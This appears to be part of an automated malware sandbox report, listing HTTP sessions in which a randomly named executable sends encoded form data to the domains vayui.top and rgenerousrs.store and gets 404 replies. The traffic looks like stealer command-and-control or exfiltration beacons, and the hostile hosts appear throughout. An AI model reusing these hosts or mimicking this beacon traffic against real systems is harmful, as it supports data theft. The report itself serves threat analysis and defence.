                                                                Nov 27, 2024 08:55:29.599221945 CET1783OUTPOST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4e 73 74 74 6a 5a 31 6c 77 4a 43 6f 55 57 51 79 59 68 66 43 71 66 6e 37 74 76 53 65 52 44 31 39 52 41 67 48 4a 35 71 6a 4d 79 32 37 62 61 33 46 56 48 36 55 52 64 54 79 56 44 55 34 68 75 71 4c 71 70 41 5a 4f 61 48 4b 49 55 46 39 51 46 2f 68 6d 66 50 4e 70 70 2f 36 46 66 2b 57 57 36 51 39 38 31 4d 73 32 79 6b 65 63 50 73 6f 2b 67 6a 78 65 43 56 6b 70 2b 66 68 64 42 78 64 31 6f 6c 4a 35 52 33 30 44 32 47 31 6c 39 44 55 39 33 4b 6b 59 34 37 74 37 47 36 69 69 42 38 76 5a 61 75 69 64 57 33 43 [TRUNCATED]
                                                                Data Ascii: 6dr=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1NsttjZ1lwJCoUWQyYhfCqfn7tvSeRD19RAgHJ5qjMy27ba3FVH6URdTyVDU4huqLqpAZOaHKIUF9QF/hmfPNpp/6Ff+WW6Q981Ms2ykecPso+gjxeCVkp+fhdBxd1olJ5R30D2G1l9DU93KkY47t7G6iiB8vZauidW3Cy643FAbGAxs+jDR4nzgzNeEGuiY+A5dvLdYTglf+y+WBlWMYOHfqeIFTj48Ug4TLor9co2t46GhrldHCfmQ1rT/0ElhGE+34rmQpDBScfUvdBxd2oFmqHIJPFYPD+v9YJUrItLGdoFGxofYZ9fL+adsHbehdNZq021yBT0XmaDXZ8HA0k+J2ukOG3G1qfqJXs0V38LOIaoMTM82i1sfoR9HwAHvBD/TRjswbU/udZ09CdakKcjyefN6fNgcRm2O0NMLTqTCp66a/KtcqWURSRBo1SUUj83Yih2od6iO14lPzNHDeaeM//x5FsJkeyXWhuXvkX6oa9ChMkI1pTJCUjyQzNEJrzHNBzyUvYERBpZctADcmcjRTZONUHJslf8I7bbYODBSL9xHxFuKj0hlzIg4MVBsbni4ghoGt9E/mb2KSkK1DXug72qFLUrUsglnU0QAK3X7nqWAsFwWyrkf6Oo01ABk7aCHpURESrHMhH8tM4/qQ7NYzuOExXyqF7MjKUn4xvjjyje0N82rLx40HARXVYdx6miEKGzxtnRb+v7Jc+HgaMstuoOb7VZ9TGFZt+6ogmeXirJflTuF1Up624kJcQBZVOSVm+v27hIbuDXmHVo30PNfLlUvRhTYPX/wGS2srzzHqXv9nUacXFYNph5TIlDpCracfdY [TRUNCATED]
                                                                Nov 27, 2024 08:55:30.869734049 CET905INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:30 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCc2KcmjLsV8PRD2ugtrUvOmlYgXI12iciS4Dsakf1T0Vz61GK8J5F9MwViNSx45p6RJi9hUCQDooJtqGRVoBstbVXME8ADSHLJ%2FIjFWLGcGNaTLsOiqopq4S5%2BtyyF0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e6bfb8c8cc0-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.650009172.67.145.234804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:32.265881062 CET495OUTGET /vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:33.460850954 CET894INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zsSNk94fbpZn0%2FKtIyaVjlxRad66c1nRYsDOZ9VViVYiLjz%2F8mE3SXCK3j3%2FrX0kxLEJAhhz6SkWaDMUQfEEr7myJC9sj7PScMglQpYTHQ4mD8Kv69j3nKjSiddomww7"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e7caeb34386-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.650010172.67.167.146804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:38.984736919 CET770OUTPOST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 71 74 55 62 6a 6a 6c 30 52 7a 54 78 65 34 32 2b 50 5a 6c 6b 34 33 56 4c 33 44 49 61 46 45 73 2f 63 76 31 6c 57 35 39 52 65 36 42
                                                                Data Ascii: 6dr=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmqtUbjjl0RzTxe42+PZlk43VL3DIaFEs/cv1lW59Re6B
                                                                Nov 27, 2024 08:55:40.463380098 CET1070INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:40 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFckI5tGqzTEcjNp4DuYGxsjwG0Nn7U0zbtwrU3rw9xBXIOnEoqMJaGdQsg6sJjMOny38I0pt5EHzqKx1ILVgzfUbYAjCwvKZrFu5QJ6qbyqkaVxhWMd0LwzhXoTO9WZSw9wagab%2Bgs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ea6df277274-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.650011172.67.167.146804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:41.763883114 CET794OUTPOST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 58 58 4c 31 62 36 61 6c 45 47 39 63 58 31 33 42 31 61 65 71 66 69 31 37 70 44 32 4d 36 75 75 62 77 64 6f 4d 64 46 78 7a 71 38 38 51 3d 3d
                                                                Data Ascii: 6dr=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oXXL1b6alEG9cX13B1aeqfi17pD2M6uubwdoMdFxzq88Q==
                                                                Nov 27, 2024 08:55:43.124485016 CET1067INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:42 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8WNQR3%2BwwbqUhFmGLUzNgU4Uyt8FoIi12qxV2pbYo7stPG2n4dU%2FMWmtJdUAyDAfL4sjQrukZnX2ZevQT1zFBrCJGO3ieQJWs4K7Q6WN677aPk1jpMZtHghZG5Kyk00obES5m7suPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908eb75b394289-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.650012172.67.167.146804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:44.569236040 CET1807OUTPOST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 50 73 70 50 59 61 6c 4d 49 52 73 71 54 4c 53 48 54 4f 63 54 73 68 35 4f 6e 53 32 77 6f 75 51 37 76 62 30 2b 78 56 39 4d 6e 70 34 64 46 30 6a 34 30 55 77 33 7a 33 67 71 4a 37 57 4b 52 34 36 44 4c 48 4e 69 66 66 6c 54 4a 2b 4d 2b 53 38 59 6a 67 36 59 61 30 4b 59 69 72 4c 53 54 4f 30 65 49 67 41 6a 66 59 43 34 42 79 6a 49 2b 79 53 71 2b 73 77 62 34 43 79 62 50 75 6d 72 48 41 4b 31 55 45 71 59 74 79 48 4a 63 75 51 65 33 72 53 71 49 2b 6d 6f 45 53 6d 79 64 37 6a 4e 71 42 43 55 61 57 6a 74 55 [TRUNCATED]
                                                                Data Ascii: 6dr=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzPspPYalMIRsqTLSHTOcTsh5OnS2wouQ7vb0+xV9Mnp4dF0j40Uw3z3gqJ7WKR46DLHNifflTJ+M+S8Yjg6Ya0KYirLSTO0eIgAjfYC4ByjI+ySq+swb4CybPumrHAK1UEqYtyHJcuQe3rSqI+moESmyd7jNqBCUaWjtUM9+Dp/kHXMpLs7t5ebaFEVA4nOPf2rWzp1mCH6xH426LkwrEcTlUtp9HY5OIMv2aqagH3a8OuGoirChRHi6eyXL3WIU23gKACOsHW0jarXUxcbaBiIuFWpazD/1sC4PsUMOIyCLziuPW/FgtnH+7OBp85ndDSFm1sMOXgiaUUGpraPapF1S15IE1g0C3/n/+IoyBvnr9wiDOi2n3moHO4r/SBOxSa7V0HfP+yJPmw6wj+pmE05XuMNcpOK2vJpsws4LrxeqWcq2YXe6eHdhSVZ1E+p6aQmIJeZ3ebloKDzPCWS42BFxNgXfkSQ7BCFBDXuUKHfHgx99hkNmn5dUe2RazIEV7tJSCMu7LD8YuoQfJElT3+DKh5Elo5/elE0L8FNE2gudvySpv2ErInJWB9TXipWLBTxAYboie4AXPR8+LT0imYTOQH/1uY+zuekhVm5yIyBI3FeLRYLzDac4jxl56vDANn920pQ6ZuQMdy/iwFSTjdl7cfJrUtShP858te5jA5CLGmsldeawfsoETBdh7cNybT1HrCsv+dSxJXuK/eNaMgK2+XSXQnkr4Rd/IwDht0lUIqrjJ5mJ/T7aJBEMgSJDazPlnuEWG11ec8rfDfs/Tsfk0ERbBQUkhh1PwX1WDpR4emyONBPlA3Tkmvh7flClkfBOt/G [TRUNCATED]
                                                                Nov 27, 2024 08:55:45.943701982 CET1071INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:45 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5X6PjxzMUJt4eqCGYvH08I7r%2BKLtvAX5O9eFP3RqTB4jjjSp56Ddplakrz1PNhssEzG9f21vfgIbuIVmGd6c38DFGJnatYTmQNkrvU2dbhRbeOMqBxnEPhPhLp5WTdEE1EGzw0GfIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ec93be4429a-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.650013172.67.167.146804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:47.230771065 CET503OUTGET /o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:48.702327013 CET1085INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:48 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrufJxLZ%2FVgL2esuhAHwZAkRphuH7iAbvctJyiKbcKPThg1c5pKFM8UUoOi8GocHXSzM22PQKXzPBXQF7gHGonW6k7Nem%2BRhmjbYU3AVuDp3FBqv1QGELYhZPXYdZitU6E2YrluqH3I%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908eda7ca54339-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
